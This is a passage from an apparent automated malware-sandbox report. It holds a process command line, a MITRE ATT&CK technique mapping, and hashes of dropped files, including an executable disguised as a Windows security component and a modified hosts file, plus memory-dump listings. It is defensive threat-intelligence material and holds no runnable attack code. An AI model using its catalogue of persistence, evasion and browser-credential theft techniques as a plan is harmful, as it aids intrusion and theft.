      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7436.tmp" "c:\Users\Admin\AppData\Local\Temp\4sfzvelq\CSCB71B9D055B646CC9C276F29B47954.TMP"
      4⤵
      PID:1428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
011984c26242f4df4b34ebf8c8672465

SHA1
3d15b6dd977272a8e9c0841b5bae3b02445e2af3

SHA256
8b76a3b7a14b24e0a74230355dc783ec476d20a65f0f26af3f42f59bc89f691c

SHA512
1f07897e526deb11f6e3469471a77514c5cc4630a6476642d4090ee4b4c4603f054b3e7f2a8de93134494d90192c6df958aaff4d9b43c126a0fe2d072cd09a99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b194829976d6cbf67e0b9ecc45c64de4

SHA1
ac5b1ae7ed21790facc04c9eb6d1a5e87b214cff

SHA256
3d9c2bed407833f86e279545f1a3626360659881dd2f7d2e780c5765cc51b91a

SHA512
b83455790878b44559d19a8305a25cf40a4015b91ee71b26dc41b3c850a51fdee4e7a5124f1fb1dd22f49edf3985f8a08286507fbe2a4bb479eebc206e13046f

Download Submit
C:\Users\Admin\AppData\Local\Temp\4sfzvelq\4sfzvelq.dll

Filesize
4KB

MD5
6d8f6ba5cc695aa22786388107b06eb7

SHA1
e61ae386d885d7bf76fb5314a9dd12404c5f73a8

SHA256
def6b621508addca63417fb1559d5a9f2d9783c0c5689825333e19de84c07f21

SHA512
e7a96fd2e8c257344de9bdb53db27a9651f00edbb56c48530e5214613d02c6c43da0194d1753b3e8eeed6e70f08cea808203659c6ccc733debda03c5853cef73

Download Submit
C:\Users\Admin\AppData\Local\Temp\KeqsqYMgnh\Display (1).png

Filesize
404KB

MD5
6f732f58c815050c3e34ef1c6c20eacb

SHA1
4529552937ceaee353a2dc3c197c8c730419e2ea

SHA256
d81db754d9a57ac830f794d794b4c8e89e9a14f69b53b3a96f2f1942b7f46982

SHA512
7388efc05a8bfba58a6530ef292ac4627e3eff41a7c827184b8629aa795f5a36322b2cf44ebbbb4b7a1a94a715a7e372fedbab789cb49efaf38beee1ab11d4fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7436.tmp

Filesize
1KB

MD5
cffddb5ad6595eba2bf80029cf1ed68d

SHA1
65f09f65b201cb196598f3a72fa762f21485eb8b

SHA256
db8aa71da55d5e351d0f572ecf8293df6ef66016fc4903948ce24b148c3e1149

SHA512
ce91932288997f39cb4665e7144055df5c2b242d608d44acff40f16333fa19af5792c9947db7936b7c371acb310c6d17c618aa9ee8e17345374e7cdb39f295d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qq3ncvx3.0nj.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
3.3MB

MD5
b5e648164187948c217eea6ccc050309

SHA1
477da0d8ecbd5a701e194a3428d903339688a303

SHA256
1bfddb30d8d99718799ec533d513c7eb8e0ca3fd2aff87bb19c3ad0d09b73c13

SHA512
538c8ccc62ffd4cd4d204df6eb168312b00901b24eb07c92e272555def8420e37dcd9c7fcb4cec84ea9e340563b5c1a6664ab66cdcc5540bf86f09b557141678

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
29637f421cb5eb9a9008b5b091823270

SHA1
8bb0b01ef0035a029c4ba8f6814db41fba1e716a

SHA256
d3925354d35ce50360d165ece7ab2d44ee49a7aaac7f297ad8f2192249432a46

SHA512
08a1efeaf082525439af8abfb117d3473ab23da5a4db276bdb49eb4a62db8ae2e14e6333c897753a22855a3c45beb413c3eafc98c2a46142c75297ce4d563665

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4sfzvelq\4sfzvelq.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4sfzvelq\4sfzvelq.cmdline

Filesize
607B

MD5
1ca1c2987d444f42891da2ad98fa1572

SHA1
86f55274c592f3d9790a8febbb1cc7d97ca672da

SHA256
ca7e549e937c99781c835fd8d7830a82463d4308882861f09e0620e92489c8d3

SHA512
c102c80f42ce0f598342268f2090cfccf7cbc5659aea37a7eba304e5de535b2756de679cdbe5c199a4b5fc43021622db23297f02c20bb9f18bb3d2f7ff1e6510

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4sfzvelq\CSCB71B9D055B646CC9C276F29B47954.TMP

Filesize
652B

MD5
42daab25df6455ae1efc656ee963a27e

SHA1
0ff705e41b3647a28aa686f18fa29cb50ff46b22

SHA256
a1e1a378d3e249d3492c2ce40eb3fc0fd013e88c7394976bc44c621bc2ff1774

SHA512
2249f43aad4a600034320da11185ed7f683a7c11d9bdd857d49133b9373556d2180a7a0de7769cde7edc46418f8dfd31c79bb1f356546bbf6922c1f1f9a7b841

Download Submit
memory/396-62-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

Filesize
9.9MB

Download
memory/396-7-0x00007FFCAC3F3000-0x00007FFCAC3F4000-memory.dmp

Filesize
4KB

Download
memory/396-52-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

Filesize
9.9MB

Download
memory/396-19-0x000001DA1AC50000-0x000001DA1ACC6000-memory.dmp

Filesize
472KB

Download
memory/396-15-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

Filesize
9.9MB

Download
memory/396-14-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

Filesize
9.9MB

Download
memory/396-12-0x000001DA02810000-0x000001DA02832000-memory.dmp

Filesize
136KB

Download
memory/2124-184-0x000001DD523F0000-0x000001DD523F8000-memory.dmp

Filesize
32KB

Download
memory/3428-192-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-190-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-191-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-0-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-193-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-194-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-195-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-196-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-197-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-198-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-199-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-200-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-201-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-202-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-203-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download
memory/3428-204-0x00000000008B0000-0x00000000012EF000-memory.dmp

Filesize
10.2MB

Download